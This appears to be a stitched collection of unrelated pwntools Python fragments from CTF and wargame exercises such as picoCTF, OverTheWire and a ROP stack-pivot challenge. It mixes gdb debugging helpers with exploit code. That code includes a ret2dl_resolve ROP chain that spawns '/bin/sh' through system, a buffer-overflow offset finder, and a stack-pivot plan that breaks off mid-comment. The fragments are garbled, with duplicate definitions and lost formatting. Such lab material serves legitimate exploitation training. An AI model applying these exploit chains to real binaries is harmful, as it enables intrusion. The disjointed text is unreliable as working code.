def debug(r, bps, elf): script = ( "set verbose on\n" # set debug-file-directory /home/user/libs/glibc-2.27/debug ) script += add_bps(r, bps, elf) print(script) gdb.attach(r, gdbscript=script)
def set_bp(io, *args): gdbscript = '' for breakpoint in args: if type(breakpoint) == str: gdbscript += 'b %s\n' % breakpoint continue elif type(breakpoint) == tuple: addr, cmd_list = breakpoint assert type(cmd_list) == list bp_cmds = 'commands\n' bp_cmds += '\n'.join(cmd_list) bp_cmds += '\nend\n' else: addr = breakpoint bp_cmds = '' gdbscript += 'bp 0x%x\n%s' % (addr, bp_cmds) if args: gdbscript += 'c' try: gdb.attach(io, gdbscript) except AttributeError: # hack to fix libc docker containers pass
def main(): if args.GDB: p = process(binary, aslr=False) gdb.attach(p.pid) else: p = process(binary, aslr=False) p.recvuntil(END_OF_MENU) launch_attack(p)
def main(): if args.GDB: # p = gdb.debug(binary, gdbscript=gs) p = process(binary, aslr=False) gdb.attach(p.pid) else: p = process(binary, aslr=False) p.recvuntil(END_OF_MENU) leak_libc(p)
def attach(r): if LOCAL: # dbg_file = "libc/usr/lib/debug/.build-id/ce/17e023542265fc11d9bc8f534bb4f070493d30.debug" bkps = [ # elf.symbols["main"], ] cmds = [ # "heap-analysis-helper", # "format-string-helper", # gdb_load_symbols_cmd(dbg_file, libc, r.libs()[libc.path]), # "bp * $_base() + 0x1337", ] gdb.attach(r, '\n'.join(["break *{:#x}".format(x) for x in bkps] + cmds)) return
def get_process(self, ld_preload=False, ld_linux=False): p = None if args.REMOTE: p = remote(self.host, self.port) else: env = {'LD_PRELOAD': self.libc_name} if ld_preload else None argv = [] if ld_linux: argv.append(self.ld_linux_name) argv.append(self.elf_name) p = process(argv, env=env) if args.GDB: gdb.attach(p.pid, self.gdb_script) return p
def get_process(): r = None if args.REMOTE: HOME_DIR = os.environ['HOME'] keyfile = os.path.join(HOME_DIR, '.ssh', 'id_rsa_picoctf') ExploitInfo.pico_shell = ssh(host='2018game.picoctf.com', user='******', keyfile=keyfile) r = ExploitInfo.pico_shell.process(ExploitInfo.name_on_shell) else: r = process('./%s' % ExploitInfo.name) if args.GDB: gdb.attach(r.pid, ExploitInfo.gdb) return r
from pwn import gdb from pwn import context from time import sleep r = process('./bof') context.log_level = 'debug' r.recv() rop = ROP('./bof') offset = 112 bss_base = rop.section('.bss') buf = rop.fill(offset) buf += rop.call('read', 0, bss_base, 100) ## used to call dl_Resolve() buf += rop.dl_resolve_call(bss_base + 20, bss_base) gdb.attach(r) r.send(buf) sleep(15) buf = rop.string('/bin/sh') buf += rop.fill(20, buf) print 'buf len =' + str(len(buf)) ## used to make faking data, such relocation, Symbol, Str buf += rop.dl_resolve_data(bss_base + 20, 'system') buf += rop.fill(100, buf) r.send(buf) r.interactive()
ELF_LOADED = ELF(LOCAL_BIN) # Extract data from binary ROP_LOADED = ROP(ELF_LOADED) # Find ROP gadgets elif REMOTESSH: ssh_shell = ssh('bandit0', 'bandit.labs.overthewire.org', password='******', port=2220) p = ssh_shell.process(REMOTE_BIN) # start the vuln binary elf = ELF(LOCAL_BIN) # Extract data from binary rop = ROP(elf) # Find ROP gadgets if GDB and not REMOTETTCP and not REMOTESSH: # attach gdb and continue # You can set breakpoints, for example "break *main" gdb.attach(P.pid, "b *main") ########################## ##### OFFSET FINDER ###### ########################## OFFSET = b"" #b"A"*264 if OFFSET == b"": gdb.attach(P.pid, "c") #Attach and continue payload = cyclic(264) payload += b"AAAAAAAA" print(P.clean()) P.sendline(payload) #x/wx $rsp -- Search for bytes that crashed the application #print(cyclic_find(0x63616171)) # Find the offset of those bytes P.interactive()
def debug(proc): p = process(proc, level="debug") gdb.attach(p) return p
from pwn import process, ELF, ROP, packing, context, gdb context.log_level = 'critical' # enable/disable aslr: echo 2 | sudo tee /proc/sys/kernel/randomize_va_space, echo 0 | sudo tee /proc/sys/kernel/randomize_va_space e = ELF("pivot") l = ELF("libpivot.so") p = process(e.path) r = ROP(e) pid = gdb.attach(p) # opens a new shell for gdb debugging rop_addr = p.recvuntil("> ").split(b":")[1].split(b"\n")[0].lstrip().decode() print("pivot @: " + rop_addr) ''' pop rax; ret xchg rsp, rax; ret allows us to set the stack pointer to anything we want. exploit logic: 1) set stack pointer to 0x7ffff7be4f10 using xchg ---rop chain--- 2) call foothold_function - this updates its entry in the .got.plt table 3) alter .got.plt address of .got.plt to be the address of the ret2win function in libpivot: - pop rax - addr_of_plt_got_foothold_function - mov rax, qword ptr [rax] - pop rbp